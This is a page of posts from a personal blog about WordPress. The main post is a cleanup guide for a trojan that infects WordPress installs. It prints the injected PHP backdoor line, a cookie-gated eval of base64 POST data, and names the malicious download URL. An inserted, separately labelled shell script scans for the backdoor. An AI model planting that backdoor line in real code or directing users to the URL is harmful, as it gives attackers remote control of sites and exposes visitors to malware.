Jason Cosper

Semper fudge.

Tag: Weblogging Page 1 of 3

Blog Days Are Over

Earlier this morning I confirmed the domain transfers for something that I spent almost six years of my life on. A site that I both obsessed over and neglected terribly.

As of 8 AM, Preshrunk is somebody else’s baby. Saying that is a real punch in the (emotional) dick, but at least I know it’s in good hands now.

I’m not going to use this post to talk about why I sold the site. That’s already been covered in enough detail. All I really want to say is that I’m happy it went to a good home.

Oh, I’m also happy that I can pay off a respectable chunk of our wedding loan — but that’s only because the interest rate is embarrassingly high.

Hopefully I’ll have a little more time to post here now. Considering my track record tho, I wouldn’t hold my breath for that…

Goodbye Horses

So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed. When visiting an infected site, most folks are being prompted to download:

http://gvatemal.biz/pfd/spl/pdf.pdf

Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

So how do you find out if your install has been hit? Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php:

<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

If you see that floating around, get rid of it! Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

grep -R 0bdcf3981272c15a /home/user/example.com/*

Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed. Give that command a few minutes to run and you should get a path of where that code snippet can be found. All you have to do at that point is purge it and clear any cache you might have on your WP install.
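The recursive grep above, extended into a small sweep (an added example, not part of the original post). It looks for the post's cookie-name indicator in every text file, dotfiles included, and, as an assumption about how variants might look, for any eval(base64_decode(...)) fed from request data in PHP files. The function names and the output format are made up for this example.

```shell
#!/bin/sh
# Added example (not from the original post): sweep a WordPress tree for the
# injected loader. Prints one "REASON<TAB>PATH<TAB>FIRST_LINE" row per hit.

# Indicator taken from the post: the cookie name the injected line checks.
COOKIE_IOC='0bdcf3981272c15a'
# Assumption: variants keep the eval(base64_decode($_POST[...])) shape but may
# change the cookie name or read from another request superglobal.
GENERIC_RE='eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(POST|GET|COOKIE|REQUEST)'

# Line number of the first match of regex $1 in file $2.
first_line() { grep -nE -- "$1" "$2" | head -n 1 | cut -d: -f1; }

scan_wp_tree() {
  root=$1
  [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }

  # Pass 1: the exact indicator, in any text file. Handing grep the directory
  # itself (no trailing /* glob) also covers dotfiles and dot-directories.
  grep -RIlF -- "$COOKIE_IOC" "$root" 2>/dev/null | while IFS= read -r f; do
    printf 'ioc\t%s\t%s\n' "$f" "$(first_line "$COOKIE_IOC" "$f")"
  done

  # Pass 2: the generic shape in PHP files not already reported by pass 1.
  grep -RIlE --include='*.php' -- "$GENERIC_RE" "$root" 2>/dev/null |
  while IFS= read -r f; do
    if grep -qF -- "$COOKIE_IOC" "$f"; then continue; fi
    printf 'generic\t%s\t%s\n' "$f" "$(first_line "$GENERIC_RE" "$f")"
  done
  return 0
}

# Run directly as: sh scan.sh /home/user/example.com
if [ "$#" -gt 0 ]; then scan_wp_tree "$1"; fi
```

A row tagged "ioc" with line 1 in index.php is the case described in the post; "generic" rows need a human look before anything is deleted.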

Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.

In Transit

Heads up, SF peeps! This weekend I’ll be driving up to the Yay Area for WordCamp to rep both DreamHost and Preshrunk in an official capacity.

As it stands, I’m driving up Friday night and crashing out at Frazier’s secret headquarters somewhere in the East Bay. Since I don’t like being part of the problem — or paying for parking — I’ll be taking as much public transit as I possibly can. So it’s handy that I managed to stumble upon these handy iPhone related Muni apps that use NextBus information. Now all I need is a native looking (i.e. pretty) trip planner and I’m all set. So… Does anybody know of one off the top of their heads — or am I stuck using 511.org over EDGE?

Productivity

Damn. I’ve been a busy bee tonight…

Sadly, I can’t remember the last time I pulled off that much stuff in an evening. All I know is that it feels good to be productive for a change. Perhaps I can manage to keep it up.

Attack Of The Comment Spam

Something that’s been really grinding my gears lately is the amount of comment spam that I’ve been seeing in my moderation queue. Despite the fact that I use the very wonderful Akismet for WordPress, sometimes it can’t keep up with the flood coming down the proverbial tubes.

Something that’s really helped is a little bit of .htaccess magic that one of my coworkers sent me. What it does is keep people from hitting your wp-comments-post.php unless they’re submitting the request from your server. Of course headers can be forged, but it’s really proven to be quite useful to me. Because of this, I thought I’d be a nice guy and share it with y’all. Peep this…

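RewriteEngine On
# Only look at POSTs to the comment handler
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} wp-comments-post\.php
# ...whose referer is not your site (keep the backslash before the dot) or whose user agent is empty
RewriteCond %{HTTP_REFERER} !yourdomain\.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
# Bounce the request back to the client's own address
RewriteRule (.*) http://%{REMOTE_ADDR}/ [R=301,L]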

Naturally, you’re going to want to replace “yourdomain.com” with your actual domain — but other than that, it’s ready to go. Since I spend a lot of my day helping folks troubleshoot their WordPress installs and .htaccess rules, I’d really dig it if you’d refrain from asking questions. That’s right, this spot of code is supplied “as is”, kids.

Enjoy!
